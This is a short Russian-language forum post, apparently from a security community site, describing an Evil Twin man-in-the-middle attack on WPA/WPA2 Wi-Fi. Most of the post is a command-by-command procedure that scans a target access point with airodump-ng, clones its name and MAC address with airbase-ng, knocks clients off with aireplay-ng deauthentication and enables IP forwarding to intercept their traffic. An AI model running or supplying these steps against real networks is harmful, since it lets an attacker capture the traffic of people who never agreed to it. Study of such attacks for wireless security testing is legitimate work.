Гостевая статья WPA/WPA2 Evil Twin Attack – MITM

  • Автор темы Автор темы Vlad
  • Дата начала Дата начала

Vlad

Green Team
28.01.2019
92
27
Evil-Twin-Attack.png



Целью атаки Evil Twin является дублирование сети с одинаковым именем сети (ESSID и mac BSSID) в надежде, что клиенты подключатся к точке доступа. Затем злоумышленник может выполнить атаку «человек посередине» и перехватить трафик.

Указание целевой точки доступа с помощью airodump-ng
Код:
airodump-ng –bssid <Access Point MAC> wlan0mon

Подмена ESSID (имя сети) и BSSID (Mac-адрес) с помощью airbase-ng
Код:
airbase-ng -a <Access Point MAC> –essid “<Network Name>” -c 10 wlan0mon

Отмена аутентификации доступа
Код:
aireplay-ng -0 5 -a <Access Point MAC> wlan0mon
В результате клиент теперь подключится к нашей сети, и мы сможем перехватить любой трафик, отправляемый подключенными клиентами.

Включение IP-пересылки
Если мы включим IP-пересылку, мы сможем перехватить трафик.
Код:
nano /proc/sys/net/ipv4/ip_forward

Источник
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab